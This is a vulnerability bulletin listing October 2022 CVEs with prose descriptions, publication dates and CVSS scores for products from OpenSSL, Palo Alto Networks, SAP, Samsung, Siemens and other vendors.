openssl — openssl	OpenSSL supports creating a custom cipher via the legacy EVP_CIPHER_meth_new() function and associated function calls. This function was deprecated in OpenSSL 3.0 and application authors are instead encouraged to use the new provider mechanism in order to implement custom ciphers. OpenSSL versions 3.0.0 to 3.0.5 incorrectly handle legacy custom ciphers passed to the EVP_EncryptInit_ex2(), EVP_DecryptInit_ex2() and EVP_CipherInit_ex2() functions (as well as other similarly named encryption and decryption initialisation functions). Instead of using the custom cipher directly it incorrectly tries to fetch an equivalent cipher from the available providers. An equivalent cipher is found based on the NID passed to EVP_CIPHER_meth_new(). This NID is supposed to represent the unique NID for a given cipher. However it is possible for an application to incorrectly pass NID_undef as this value in the call to EVP_CIPHER_meth_new(). When NID_undef is used in this way the OpenSSL encryption/decryption initialisation function will match the NULL cipher as being equivalent and will fetch this from the available providers. This will succeed if the default provider has been loaded (or if a third party provider has been loaded that offers this cipher). Using the NULL cipher means that the plaintext is emitted as the ciphertext. Applications are only affected by this issue if they call EVP_CIPHER_meth_new() using NID_undef and subsequently use it in a call to an encryption/decryption initialisation function. Applications that only use SSL/TLS are not impacted by this issue. Fixed in OpenSSL 3.0.6 (Affected 3.0.0-3.0.5).	2022-10-11	7.5	CVE-2022-3358 CONFIRM CONFIRM
paloaltonetworks — pan-os	An authentication bypass vulnerability in the Palo Alto Networks PAN-OS 8.1 web interface allows a network-based attacker with specific knowledge of the target firewall or Panorama appliance to impersonate an existing PAN-OS administrator and perform privileged actions.	2022-10-12	8.1	CVE-2022-0030 MISC
panini — everest_engine	Panini Everest Engine 2.0.4 allows unprivileged users to create a file named Everest.exe in the %PROGRAMDATA%Panini folder. This leads to privilege escalation because a service, running as SYSTEM, uses the unquoted path of %PROGRAMDATA%PaniniEverest EngineEverestEngine.exe and therefore a Trojan horse %PROGRAMDATA%PaniniEverest.exe may be executed instead of the intended vendor-supplied EverestEngine.exe file.	2022-10-07	7.8	CVE-2022-39959 MISC MISC
passport-saml_project — passport-saml	Passport-SAML is a SAML 2.0 authentication provider for Passport, the Node.js authentication library. A remote attacker may be able to bypass SAML authentication on a website using passport-saml. A successful attack requires that the attacker is in possession of an arbitrary IDP signed XML element. Depending on the IDP used, fully unauthenticated attacks (e.g without access to a valid user) might also be feasible if generation of a signed message can be triggered. Users should upgrade to passport-saml version 3.2.2 or newer. The issue was also present in the beta releases of `node-saml` before version 4.0.0-beta.5. If you cannot upgrade, disabling SAML authentication may be done as a workaround.	2022-10-12	8.1	CVE-2022-39299 CONFIRM MISC
powerline_gitstatus_project — powerline_gitstatus	powerline-gitstatus (aka Powerline Gitstatus) before 1.3.2 allows arbitrary code execution. git repositories can contain per-repository configuration that changes the behavior of git, including running arbitrary commands. When using powerline-gitstatus, changing to a directory automatically runs git commands in order to display information about the current repository in the prompt. If an attacker can convince a user to change their current directory to one controlled by the attacker, such as in a shared filesystem or extracted archive, powerline-gitstatus will run arbitrary commands under the attacker’s control. NOTE: this is similar to CVE-2022-20001.	2022-10-13	7.8	CVE-2022-42906 MISC MISC
progress — whatsup_gold	In Progress WhatsUp Gold before 22.1.0, an SNMP MIB Walker application endpoint failed to adequately sanitize malicious input. This could allow an unauthenticated attacker to execute arbitrary code in a victim’s browser.	2022-10-12	9.6	CVE-2022-42711 MISC MISC MISC
puppet — puppetlabs-mysql	Command injection is possible in the puppetlabs-apt module prior to version 9.0.0. A malicious actor is able to exploit this vulnerability only if they are able to provide unsanitized input to the module. This condition is rare in most deployments of Puppet and Puppet Enterprise.	2022-10-07	9.8	CVE-2022-3275 MISC
puppet — puppetlabs-mysql	Command injection is possible in the puppetlabs-mysql module prior to version 13.0.0. A malicious actor is able to exploit this vulnerability only if they are able to provide unsanitized input to the module. This condition is rare in most deployments of Puppet and Puppet Enterprise.	2022-10-07	8.8	CVE-2022-3276 MISC
redirection-for-contact-form7 — redirection_for_contact_form_7	Unauthenticated Options Change and Content Injection vulnerability in Qube One Redirection for Contact Form 7 plugin <= 2.4.0 at WordPress allows attackers to change options and inject scripts into the footer HTML. Requires an additional extension (plugin) AccessiBe.	2022-10-11	7.5	CVE-2021-36913 CONFIRM CONFIRM
ree6 — ree6	Ree6 is a moderation bot. This vulnerability allows manipulation of SQL queries. This issue has been patched in version 1.7.0 by using Javas PreparedStatements, which allow object setting without the risk of SQL injection. There are currently no known workarounds.	2022-10-13	9.8	CVE-2022-39303 MISC CONFIRM
resiot — iot_platform_and_lorawan_network_server	Cross Site Request Forgery (CSRF) vulnerability in ResIOT ResIOT IOT Platform + LoRaWAN Network Server through 4.1.1000114 allows attackers to add new admin users to the platform or other unspecified impacts.	2022-10-13	8.8	CVE-2022-34020 MISC MISC
rpcms — rpcms	RPCMS v3.0.2 was discovered to contain a Cross-Site Request Forgery (CSRF) which allows attackers to arbitrarily add an administrator account.	2022-10-13	8.8	CVE-2022-41475 MISC
samsung — dynamic_lockscreen	Improper authorization in Dynamic Lockscreen prior to SMR Sep-2022 Release 1 in Android R(11) and 3.3.03.66 in Android S(12) allows unauthorized use of javascript interface api.	2022-10-07	9.8	CVE-2022-39862 MISC
samsung — smartthings	Improper access control vulnerability in WifiSetupLaunchHelper in SmartThings prior to version 1.7.89.25 allows attackers to access sensitive information via implicit intent.	2022-10-07	7.5	CVE-2022-39864 MISC
samsung — smartthings	Improper access control vulnerability in ContentsSharingActivity.java SmartThings prior to version 1.7.89.0 allows attackers to access sensitive information via implicit broadcast.	2022-10-07	7.5	CVE-2022-39865 MISC
samsung — smartthings	Improper access control vulnerability in RegisteredEventMediator.kt SmartThings prior to version 1.7.89.0 allows attackers to access sensitive information via implicit broadcast.	2022-10-07	7.5	CVE-2022-39866 MISC
samsung — smartthings	Improper access control vulnerability in cloudNotificationManager.java SmartThings prior to version 1.7.89.0 allows attackers to access sensitive information via SHOW_PERSISTENT_BANNER broadcast.	2022-10-07	7.5	CVE-2022-39867 MISC
samsung — smartthings	Improper access control vulnerability in GedSamsungAccount.kt SmartThings prior to version 1.7.89.0 allows attackers to access sensitive information via implicit broadcast.	2022-10-07	7.5	CVE-2022-39868 MISC
samsung — smartthings	Improper access control vulnerability in cloudNotificationManager.java SmartThings prior to version 1.7.89.0 allows attackers to access sensitive information via REMOVE_PERSISTENT_BANNER broadcast.	2022-10-07	7.5	CVE-2022-39869 MISC
samsung — smartthings	Improper access control vulnerability in cloudNotificationManager.java SmartThings prior to version 1.7.89.0 allows attackers to access sensitive information via PUSH_MESSAGE_RECEIVED broadcast.	2022-10-07	7.5	CVE-2022-39870 MISC
samsung — smartthings	Improper access control vulnerability cloudNotificationManager.java in SmartThings prior to version 1.7.89.0 allows attackers to access sensitive information via implicit broadcasts.	2022-10-07	7.5	CVE-2022-39871 MISC
sap — 3d_visual_enterprise_author	Due to lack of proper memory management, when a victim opens a manipulated ACIS Part and Assembly (.sat, CoreCadTranslator.exe) file received from untrusted sources in SAP 3D Visual Enterprise Author – version 9, it is possible that a Remote Code Execution can be triggered when payload forces a stack-based overflow or a re-use of dangling pointer which refers to overwritten space in memory.	2022-10-11	7.8	CVE-2022-39803 MISC MISC
sap — 3d_visual_enterprise_author	Due to lack of proper memory management, when a victim opens a manipulated SolidWorks Part (.sldprt, CoreCadTranslator.exe) file received from untrusted sources in SAP 3D Visual Enterprise Author – version 9, it is possible that a Remote Code Execution can be triggered when payload forces a stack-based overflow or a re-use of dangling pointer which refers to overwritten space in memory.	2022-10-11	7.8	CVE-2022-39804 MISC MISC
sap — 3d_visual_enterprise_author	Due to lack of proper memory management, when a victim opens a manipulated Computer Graphics Metafile (.cgm, CgmTranslator.exe) file received from untrusted sources in SAP 3D Visual Enterprise Author – version 9, it is possible that a Remote Code Execution can be triggered when payload forces a stack-based overflow or a re-use of dangling pointer which refers to overwritten space in memory.	2022-10-11	7.8	CVE-2022-39805 MISC MISC
sap — 3d_visual_enterprise_author	Due to lack of proper memory management, when a victim opens a manipulated SolidWorks Drawing (.slddrw, CoreCadTranslator.exe) file received from untrusted sources in SAP 3D Visual Enterprise Author – version 9, it is possible that a Remote Code Execution can be triggered when payload forces a stack-based overflow or a re-use of dangling pointer which refers to overwritten space in memory.	2022-10-11	7.8	CVE-2022-39806 MISC MISC
sap — 3d_visual_enterprise_author	Due to lack of proper memory management, when a victim opens a manipulated Wavefront Object (.obj, ObjTranslator.exe) file received from untrusted sources in SAP 3D Visual Enterprise Author – version 9, it is possible that a Remote Code Execution can be triggered when payload forces a stack-based overflow or a re-use of dangling pointer which refers to overwritten space in memory.	2022-10-11	7.8	CVE-2022-39808 MISC MISC
sap — 3d_visual_enterprise_author	Due to lack of proper memory management, when a victim opens a manipulated AutoCAD (.dwg, TeighaTranslator.exe) file received from untrusted sources in SAP 3D Visual Enterprise Author – version 9, it is possible that a Remote Code Execution can be triggered when payload forces a stack-based overflow or a re-use of dangling pointer which refers to overwritten space in memory.	2022-10-11	7.8	CVE-2022-41167 MISC MISC
sap — 3d_visual_enterprise_author	Due to lack of proper memory management, when a victim opens a manipulated CATIA5 Part (.catpart, CatiaTranslator.exe) file received from untrusted sources in SAP 3D Visual Enterprise Author – version 9, it is possible that a Remote Code Execution can be triggered when payload forces a stack-based overflow or a re-use of dangling pointer which refers to overwritten space in memory.	2022-10-11	7.8	CVE-2022-41168 MISC MISC
sap — 3d_visual_enterprise_author	Due to lack of proper memory management, when a victim opens a manipulated CATIA4 Part (.model, CatiaTranslator.exe) file received from untrusted sources in SAP 3D Visual Enterprise Author – version 9, it is possible that a Remote Code Execution can be triggered when payload forces a stack-based overflow or a re-use of dangling pointer which refers to overwritten space in memory.	2022-10-11	7.8	CVE-2022-41170 MISC MISC
sap — 3d_visual_enterprise_author	Due to lack of proper memory management, when a victim opens a manipulated AutoCAD (.dxf, TeighaTranslator.exe) file received from untrusted sources in SAP 3D Visual Enterprise Author – version 9, it is possible that a Remote Code Execution can be triggered when payload forces a stack-based overflow or a re-use of dangling pointer which refers to overwritten space in memory.	2022-10-11	7.8	CVE-2022-41172 MISC MISC
sap — 3d_visual_enterprise_author	Due to lack of proper memory management, when a victim opens a manipulated Enhanced Metafile (.emf, emf.x3d) file received from untrusted sources in SAP 3D Visual Enterprise Author – version 9, it is possible that a Remote Code Execution can be triggered when payload forces a stack-based overflow or a re-use of dangling pointer which refers to overwritten space in memory.	2022-10-11	7.8	CVE-2022-41175 MISC MISC
sap — 3d_visual_enterprise_author	Due to lack of proper memory management, when a victim opens a manipulated Iges Part and Assembly (.igs, .iges, CoreCadTranslator.exe) file received from untrusted sources in SAP 3D Visual Enterprise Author – version 9, it is possible that a Remote Code Execution can be triggered when payload forces a stack-based overflow or a re-use of dangling pointer which refers to overwritten space in memory.	2022-10-11	7.8	CVE-2022-41177 MISC MISC
sap — 3d_visual_enterprise_author	Due to lack of proper memory management, when a victim opens a manipulated Jupiter Tesselation (.jt, JtTranslator.exe) file received from untrusted sources in SAP 3D Visual Enterprise Author – version 9, it is possible that a Remote Code Execution can be triggered when payload forces a stack-based overflow or a re-use of dangling pointer which refers to overwritten space in memory.	2022-10-11	7.8	CVE-2022-41179 MISC MISC
sap — 3d_visual_enterprise_author	Due to lack of proper memory management, when a victim opens a manipulated Portable Document Format (.pdf, PDFPublishing.dll) file received from untrusted sources in SAP 3D Visual Enterprise Author – version 9, it is possible that a Remote Code Execution can be triggered when payload forces a stack-based overflow or a re-use of dangling pointer which refers to overwritten space in memory.	2022-10-11	7.8	CVE-2022-41180 MISC MISC
sap — 3d_visual_enterprise_author	Due to lack of proper memory management, when a victim opens a manipulated Windows Cursor File (.cur, ico.x3d) file received from untrusted sources in SAP 3D Visual Enterprise Author – version 9, it is possible that a Remote Code Execution can be triggered when payload forces a stack-based overflow or a re-use of dangling pointer which refers to overwritten space in memory.	2022-10-11	7.8	CVE-2022-41184 MISC MISC
sap — 3d_visual_enterprise_author	Due to lack of proper memory management, when a victim opens a manipulated Visual Design Stream (.vds, MataiPersistence.dll) file received from untrusted sources in SAP 3D Visual Enterprise Author – version 9, it is possible that a Remote Code Execution can be triggered when payload forces a stack-based overflow or a re-use of dangling pointer which refers to overwritten space in memory.	2022-10-11	7.8	CVE-2022-41185 MISC MISC
sap — 3d_visual_enterprise_viewer	Due to lack of proper memory management, when a victim opens manipulated Computer Graphics Metafile (.cgm, CgmCore.dll) file received from untrusted sources in SAP 3D Visual Enterprise Viewer – version 9, a Remote Code Execution can be triggered when payload forces a stack-based overflow and or a re-use of dangling pointer which refers to overwritten space in memory.	2022-10-11	7.8	CVE-2022-41186 MISC MISC
sap — 3d_visual_enterprise_viewer	Due to lack of proper memory management, when a victim opens a manipulated Wavefront Object (.obj, ObjTranslator.exe) file received from untrusted sources in SAP 3D Visual Enterprise Viewer – version 9, it is possible that a Remote Code Execution can be triggered when payload forces a stack-based overflow or a re-use of dangling pointer which refers to overwritten space in memory.	2022-10-11	7.8	CVE-2022-41187 MISC MISC
sap — 3d_visual_enterprise_viewer	Due to lack of proper memory management, when a victim opens manipulated Wavefront Object (.obj, ObjTranslator.exe) file received from untrusted sources in SAP 3D Visual Enterprise Viewer – version 9, it is possible for the application to crash and becomes temporarily unavailable to the user until restart of the application.	2022-10-11	7.8	CVE-2022-41188 MISC MISC
sap — 3d_visual_enterprise_viewer	Due to lack of proper memory management, when a victim opens a manipulated AutoCAD (.dwg, TeighaTranslator.exe) file received from untrusted sources in SAP 3D Visual Enterprise Viewer – version 9, it is possible that a Remote Code Execution can be triggered when payload forces a stack-based overflow or a re-use of dangling pointer which refers to overwritten space in memory.	2022-10-11	7.8	CVE-2022-41189 MISC MISC
sap — 3d_visual_enterprise_viewer	Due to lack of proper memory management, when a victim opens a manipulated AutoCAD (.dxf, TeighaTranslator.exe) file received from untrusted sources in SAP 3D Visual Enterprise Viewer – version 9, it is possible that a Remote Code Execution can be triggered when payload forces a stack-based overflow or a re-use of dangling pointer which refers to overwritten space in memory.	2022-10-11	7.8	CVE-2022-41190 MISC MISC
sap — 3d_visual_enterprise_viewer	Due to lack of proper memory management, when a victim opens a manipulated Jupiter Tesselation (.jt, JTReader.x3d) file received from untrusted sources in SAP 3D Visual Enterprise Viewer – version 9, it is possible that a Remote Code Execution can be triggered when payload forces a stack-based overflow or a re-use of dangling pointer which refers to overwritten space in memory.	2022-10-11	7.8	CVE-2022-41191 MISC MISC
sap — 3d_visual_enterprise_viewer	Due to lack of proper memory management, when a victim opens manipulated Jupiter Tesselation (.jt, JTReader.x3d) file received from untrusted sources in SAP 3D Visual Enterprise Viewer – version 9, it is possible for the application to crash and becomes temporarily unavailable to the user until restart of the application.	2022-10-11	7.8	CVE-2022-41192 MISC MISC
sap — 3d_visual_enterprise_viewer	Due to lack of proper memory management, when a victim opens a manipulated Encapsulated Post Script (.eps, ai.x3d) file received from untrusted sources in SAP 3D Visual Enterprise Viewer – version 9, it is possible that a Remote Code Execution can be triggered when payload forces a stack-based overflow or a re-use of dangling pointer which refers to overwritten space in memory.	2022-10-11	7.8	CVE-2022-41193 MISC MISC
sap — 3d_visual_enterprise_viewer	Due to lack of proper memory management, when a victim opens a manipulated Encapsulated Postscript (.eps, ai.x3d) file received from untrusted sources in SAP 3D Visual Enterprise Viewer – version 9, it is possible for the application to crash and becomes temporarily unavailable to the user until restart of the application.	2022-10-11	7.8	CVE-2022-41194 MISC MISC
sap — 3d_visual_enterprise_viewer	Due to lack of proper memory management, when a victim opens a manipulated EAAmiga Interchange File Format (.iff, 2d.x3d) file received from untrusted sources in SAP 3D Visual Enterprise Viewer – version 9, it is possible that a Remote Code Execution can be triggered when payload forces a stack-based overflow or a re-use of dangling pointer which refers to overwritten space in memory.	2022-10-11	7.8	CVE-2022-41195 MISC MISC
sap — 3d_visual_enterprise_viewer	Due to lack of proper memory management, when a victim opens a manipulated VRML Worlds (.wrl, vrml.x3d) file received from untrusted sources in SAP 3D Visual Enterprise Viewer – version 9, it is possible that a Remote Code Execution can be triggered when payload forces a stack-based overflow or a re-use of dangling pointer which refers to overwritten space in memory.	2022-10-11	7.8	CVE-2022-41196 MISC MISC
sap — 3d_visual_enterprise_viewer	Due to lack of proper memory management, when a victim opens a manipulated VRML Worlds (.wrl, vrml.x3d) file received from untrusted sources in SAP 3D Visual Enterprise Viewer – version 9, it is possible for the application to crash and becomes temporarily unavailable to the user until restart of the application.	2022-10-11	7.8	CVE-2022-41197 MISC MISC
sap — 3d_visual_enterprise_viewer	Due to lack of proper memory management, when a victim opens a manipulated SketchUp (.skp, SketchUp.x3d) file received from untrusted sources in SAP 3D Visual Enterprise Viewer – version 9, it is possible that a Remote Code Execution can be triggered when payload forces a stack-based overflow or a re-use of dangling pointer which refers to overwritten space in memory.	2022-10-11	7.8	CVE-2022-41198 MISC MISC
sap — 3d_visual_enterprise_viewer	Due to lack of proper memory management, when a victim opens a manipulated Open Inventor File (.iv, vrml.x3d) file received from untrusted sources in SAP 3D Visual Enterprise Viewer – version 9, it is possible that a Remote Code Execution can be triggered when payload forces a stack-based overflow or a re-use of dangling pointer which refers to overwritten space in memory.	2022-10-11	7.8	CVE-2022-41199 MISC MISC
sap — 3d_visual_enterprise_viewer	Due to lack of proper memory management, when a victim opens a manipulated Scalable Vector Graphic (.svg, svg.x3d) file received from untrusted sources in SAP 3D Visual Enterprise Viewer – version 9, it is possible that a Remote Code Execution can be triggered when payload forces a stack-based overflow or a re-use of dangling pointer which refers to overwritten space in memory.	2022-10-11	7.8	CVE-2022-41200 MISC MISC
sap — 3d_visual_enterprise_viewer	Due to lack of proper memory management, when a victim opens a manipulated Right Hemisphere Binary (.rh, rh.x3d) file received from untrusted sources in SAP 3D Visual Enterprise Viewer – version 9, it is possible that a Remote Code Execution can be triggered when payload forces a stack-based overflow or a re-use of dangling pointer which refers to overwritten space in memory.	2022-10-11	7.8	CVE-2022-41201 MISC MISC
sap — 3d_visual_enterprise_viewer	Due to lack of proper memory management, when a victim opens a manipulated Visual Design Stream (.vds, vds.x3d) file received from untrusted sources in SAP 3D Visual Enterprise Viewer – version 9, it is possible that a Remote Code Execution can be triggered when payload forces a stack-based overflow or a re-use of dangling pointer which refers to overwritten space in memory.	2022-10-11	7.8	CVE-2022-41202 MISC MISC
sap — business_objects_business_intelligence_platform	Under certain conditions an authenticated attacker can get access to OS credentials. Getting access to OS credentials enables the attacker to modify system data and make the system unavailable leading to high impact on confidentiality and low impact on integrity and availability of the application.	2022-10-11	7.6	CVE-2022-39013 MISC MISC
sap — commerce	An attacker can change the content of an SAP Commerce – versions 1905, 2005, 2105, 2011, 2205, login page through a manipulated URL. They can inject code that allows them to redirect submissions from the affected login form to their own server. This allows them to steal credentials and hijack accounts. A successful attack could compromise the Confidentiality, Integrity, and Availability of the system.	2022-10-11	8.8	CVE-2022-41204 MISC MISC
sap — manufacturing_execution	SAP Manufacturing Execution – versions 15.1, 15.2, 15.3, allows an attacker to exploit insufficient validation of a file path request parameter. The intended file path can be manipulated to allow arbitrary traversal of directories on the remote server. The file content within each directory can be read which may lead to information disclosure.	2022-10-11	7.5	CVE-2022-39802 MISC MISC
sap — sap_iq	SAP SQL Anywhere – version 17.0, and SAP IQ – version 16.1, allows an attacker to leverage logical errors in memory management to cause a memory corruption, such as Stack-based buffer overflow.	2022-10-11	9.8	CVE-2022-35299 MISC MISC
siemens — 6gk6108-4am00-2ba2_firmware	Affected devices do not properly authorize the change password function of the web interface. This could allow low privileged users to escalate their privileges.	2022-10-11	8.8	CVE-2022-31765 MISC
siemens — 7kg8500-0aa00-0aa0_firmware	A vulnerability has been identified in SICAM P850 (All versions < V3.10), SICAM P850 (All versions < V3.10), SICAM P850 (All versions < V3.10), SICAM P850 (All versions < V3.10), SICAM P850 (All versions < V3.10), SICAM P850 (All versions < V3.10), SICAM P850 (All versions < V3.10), SICAM P850 (All versions < V3.10), SICAM P850 (All versions < V3.10), SICAM P850 (All versions < V3.10), SICAM P850 (All versions < V3.10), SICAM P850 (All versions < V3.10), SICAM P850 (All versions < V3.10), SICAM P850 (All versions < V3.10), SICAM P850 (All versions < V3.10), SICAM P850 (All versions < V3.10), SICAM P850 (All versions < V3.10), SICAM P850 (All versions < V3.10), SICAM P855 (All versions < V3.10), SICAM P855 (All versions < V3.10), SICAM P855 (All versions < V3.10), SICAM P855 (All versions < V3.10), SICAM P855 (All versions < V3.10), SICAM P855 (All versions < V3.10), SICAM P855 (All versions < V3.10), SICAM P855 (All versions < V3.10), SICAM P855 (All versions < V3.10), SICAM P855 (All versions < V3.10), SICAM P855 (All versions < V3.10), SICAM P855 (All versions < V3.10), SICAM P855 (All versions < V3.10), SICAM P855 (All versions < V3.10), SICAM P855 (All versions < V3.10), SICAM P855 (All versions < V3.10), SICAM P855 (All versions < V3.10), SICAM P855 (All versions < V3.10). Affected devices do not properly validate the parameter of a specific GET request. This could allow an authenticated attacker to set the device to a denial of service state or to control the program counter and, thus, execute arbitrary code on the device.	2022-10-11	8.8	CVE-2022-41665 MISC
siemens — 7kg8500-0aa00-0aa0_firmware	A vulnerability has been identified in SICAM P850 (All versions < V3.10), SICAM P850 (All versions < V3.10), SICAM P850 (All versions < V3.10), SICAM P850 (All versions < V3.10), SICAM P850 (All versions < V3.10), SICAM P850 (All versions < V3.10), SICAM P850 (All versions < V3.10), SICAM P850 (All versions < V3.10), SICAM P850 (All versions < V3.10), SICAM P850 (All versions < V3.10), SICAM P850 (All versions < V3.10), SICAM P850 (All versions < V3.10), SICAM P850 (All versions < V3.10), SICAM P850 (All versions < V3.10), SICAM P850 (All versions < V3.10), SICAM P850 (All versions < V3.10), SICAM P850 (All versions < V3.10), SICAM P850 (All versions < V3.10), SICAM P855 (All versions < V3.10), SICAM P855 (All versions < V3.10), SICAM P855 (All versions < V3.10), SICAM P855 (All versions < V3.10), SICAM P855 (All versions < V3.10), SICAM P855 (All versions < V3.10), SICAM P855 (All versions < V3.10), SICAM P855 (All versions < V3.10), SICAM P855 (All versions < V3.10), SICAM P855 (All versions < V3.10), SICAM P855 (All versions < V3.10), SICAM P855 (All versions < V3.10), SICAM P855 (All versions < V3.10), SICAM P855 (All versions < V3.10), SICAM P855 (All versions < V3.10), SICAM P855 (All versions < V3.10), SICAM P855 (All versions < V3.10), SICAM P855 (All versions < V3.10). Affected devices accept user defined session cookies and do not renew the session cookie after login/logout. This could allow an attacker to take over another user’s session after login.	2022-10-11	8.1	CVE-2022-40226 MISC
siemens — desigo_pxm30-1_firmware	A vulnerability has been identified in Desigo PXM30-1 (All versions < V02.20.126.11-41), Desigo PXM30.E (All versions < V02.20.126.11-41), Desigo PXM40-1 (All versions < V02.20.126.11-41), Desigo PXM40.E (All versions < V02.20.126.11-41), Desigo PXM50-1 (All versions < V02.20.126.11-41), Desigo PXM50.E (All versions < V02.20.126.11-41), PXG3.W100-1 (All versions < V02.20.126.11-37), PXG3.W100-2 (All versions < V02.20.126.11-41), PXG3.W200-1 (All versions < V02.20.126.11-37), PXG3.W200-2 (All versions < V02.20.126.11-41). The device embedded Chromium-based browser is launched as root with the “–no-sandbox” option. Attackers can add arbitrary JavaScript code inside “Operation” graphics and successfully exploit any number of publicly known vulnerabilities against the version of the embedded Chromium-based browser.	2022-10-11	8.8	CVE-2022-40182 MISC
siemens — desigo_pxm30-1_firmware	A vulnerability has been identified in Desigo PXM30-1 (All versions < V02.20.126.11-41), Desigo PXM30.E (All versions < V02.20.126.11-41), Desigo PXM40-1 (All versions < V02.20.126.11-41), Desigo PXM40.E (All versions < V02.20.126.11-41), Desigo PXM50-1 (All versions < V02.20.126.11-41), Desigo PXM50.E (All versions < V02.20.126.11-41), PXG3.W100-1 (All versions < V02.20.126.11-37), PXG3.W100-2 (All versions < V02.20.126.11-41), PXG3.W200-1 (All versions < V02.20.126.11-37), PXG3.W200-2 (All versions < V02.20.126.11-41). The device embedded browser does not prevent interaction with alternative URI schemes when redirected to corresponding resources by web application code. By setting the homepage URI, the favorite URIs, or redirecting embedded browser users via JavaScript code to alternative scheme resources, a remote low privileged attacker can perform a range of attacks against the device, such as read arbitrary files on the filesystem, execute arbitrary JavaScript code in order to steal or manipulate the information on the screen, or trigger denial of service conditions.	2022-10-11	8.3	CVE-2022-40181 MISC
siemens — desigo_pxm30-1_firmware	A vulnerability has been identified in Desigo PXM30-1 (All versions < V02.20.126.11-41), Desigo PXM30.E (All versions < V02.20.126.11-41), Desigo PXM40-1 (All versions < V02.20.126.11-41), Desigo PXM40.E (All versions < V02.20.126.11-41), Desigo PXM50-1 (All versions < V02.20.126.11-41), Desigo PXM50.E (All versions < V02.20.126.11-41), PXG3.W100-1 (All versions < V02.20.126.11-37), PXG3.W100-2 (All versions < V02.20.126.11-41), PXG3.W200-1 (All versions < V02.20.126.11-37), PXG3.W200-2 (All versions < V02.20.126.11-41). A Cross-Site Request Forgery exists in endpoints of the “Operation” web application that interpret and execute Axon language queries, due to the missing validation of anti-CSRF tokens or other origin checks. By convincing a victim to click on a malicious link or visit a specifically crafted webpage while logged-in to the device web application, a remote unauthenticated attacker can execute arbitrary Axon queries against the device.	2022-10-11	8.1	CVE-2022-40179 MISC
siemens — desigo_pxm30-1_firmware	A vulnerability has been identified in Desigo PXM30-1 (All versions < V02.20.126.11-41), Desigo PXM30.E (All versions < V02.20.126.11-41), Desigo PXM40-1 (All versions < V02.20.126.11-41), Desigo PXM40.E (All versions < V02.20.126.11-41), Desigo PXM50-1 (All versions < V02.20.126.11-41), Desigo PXM50.E (All versions < V02.20.126.11-41), PXG3.W100-1 (All versions < V02.20.126.11-37), PXG3.W100-2 (All versions < V02.20.126.11-41), PXG3.W200-1 (All versions < V02.20.126.11-37), PXG3.W200-2 (All versions < V02.20.126.11-41). There exists an Improper Neutralization of Special Elements used in an OS Command with root privileges during a restore operation due to the missing validation of the names of files included in the input package. By restoring a specifically crafted package, a remote low-privileged attacker can execute arbitrary system commands with root privileges on the device, leading to a full compromise.	2022-10-11	8	CVE-2022-40176 MISC
siemens — industrial_edge_management	A vulnerability has been identified in Industrial Edge Management (All versions < V1.5.1). The affected software does not properly validate the server certificate when initiating a TLS connection. This could allow an attacker to spoof a trusted entity by interfering in the communication path between the client and the intended server.	2022-10-11	7.4	CVE-2022-40147 MISC
siemens — jt_open_toolkit	A vulnerability has been identified in JTTK (All versions < V11.1.1.0), Simcenter Femap V2022.1 (All versions < V2022.1.3), Simcenter Femap V2022.2 (All versions < V2022.2.2). The JTTK library is vulnerable to an uninitialized pointer reference vulnerability while parsing specially crafted JT files. An attacker could leverage this vulnerability to execute code in the context of the current process. (ZDI-CAN-16973)	2022-10-11	7.8	CVE-2022-41851 MISC
siemens — logo!_8_bm_firmware	A vulnerability has been identified in LOGO! 8 BM (incl. SIPLUS variants) (All versions). Affected devices do not properly validate the structure of TCP packets in several methods. This could allow an attacker to cause buffer overflows, get control over the instruction counter and run custom code.	2022-10-11	9.8	CVE-2022-36361 MISC
siemens — logo!_8_bm_firmware	A vulnerability has been identified in LOGO! 8 BM (incl. SIPLUS variants) (All versions < V8.3). Affected devices load firmware updates without checking the authenticity. Furthermore the integrity of the unencrypted firmware is only verified by a non-cryptographic method. This could allow an attacker to manipulate a firmware update and flash it to the device.	2022-10-11	7.5	CVE-2022-36360 MISC
siemens — logo!_8_bm_firmware	A vulnerability has been identified in LOGO! 8 BM (incl. SIPLUS variants) (All versions). Affected devices do not conduct certain validations when interacting with them. This could allow an unauthenticated remote attacker to manipulate the devices IP address, which means the device would not be reachable and could only be recovered by power cycling the device.	2022-10-11	7.5	CVE-2022-36362 MISC
siemens — nucleus_net	A vulnerability has been identified in Nucleus NET (All versions), Nucleus ReadyStart V3 (All versions), Nucleus Source Code (Versions including affected FTP server). The FTP server does not properly release memory resources that were reserved for incomplete connection attempts by FTP clients. This could allow a remote attacker to generate a denial of service condition on devices that incorporate a vulnerable version of the FTP server.	2022-10-11	7.5	CVE-2022-38371 MISC MISC
siemens — ruggedcom_rm1224_firmware	A vulnerability has been identified in RUGGEDCOM RM1224 LTE(4G) EU (All versions < V7.1.2), RUGGEDCOM RM1224 LTE(4G) NAM (All versions < V7.1.2), SCALANCE M804PB (All versions < V7.1.2), SCALANCE M812-1 ADSL-Router (Annex A) (All versions < V7.1.2), SCALANCE M812-1 ADSL-Router (Annex B) (All versions < V7.1.2), SCALANCE M816-1 ADSL-Router (Annex A) (All versions < V7.1.2), SCALANCE M816-1 ADSL-Router (Annex B) (All versions < V7.1.2), SCALANCE M826-2 SHDSL-Router (All versions < V7.1.2), SCALANCE M874-2 (All versions < V7.1.2), SCALANCE M874-3 (All versions < V7.1.2), SCALANCE M876-3 (EVDO) (All versions < V7.1.2), SCALANCE M876-3 (ROK) (All versions < V7.1.2), SCALANCE M876-4 (EU) (All versions < V7.1.2), SCALANCE M876-4 (NAM) (All versions < V7.1.2), SCALANCE MUM853-1 (EU) (All versions < V7.1.2), SCALANCE MUM856-1 (EU) (All versions < V7.1.2), SCALANCE MUM856-1 (RoW) (All versions < V7.1.2), SCALANCE S615 (All versions < V7.1.2), SCALANCE WAM763-1 (All versions >= V1.1.0), SCALANCE WAM766-1 (All versions >= V1.1.0), SCALANCE WAM766-1 (All versions >= V1.1.0), SCALANCE WAM766-1 6GHz (All versions >= V1.1.0), SCALANCE WAM766-1 EEC (All versions >= V1.1.0), SCALANCE WAM766-1 EEC (All versions >= V1.1.0), SCALANCE WAM766-1 EEC 6GHz (All versions >= V1.1.0), SCALANCE WUM763-1 (All versions >= V1.1.0), SCALANCE WUM763-1 (All versions >= V1.1.0), SCALANCE WUM766-1 (All versions >= V1.1.0), SCALANCE WUM766-1 (All versions >= V1.1.0), SCALANCE WUM766-1 6GHz (All versions >= V1.1.0). Affected devices with TCP Event service enabled do not properly handle malformed packets. This could allow an unauthenticated remote attacker to cause a denial of service and reboot the device thus possibly affecting other network resources.	2022-10-11	8.6	CVE-2022-31766 MISC
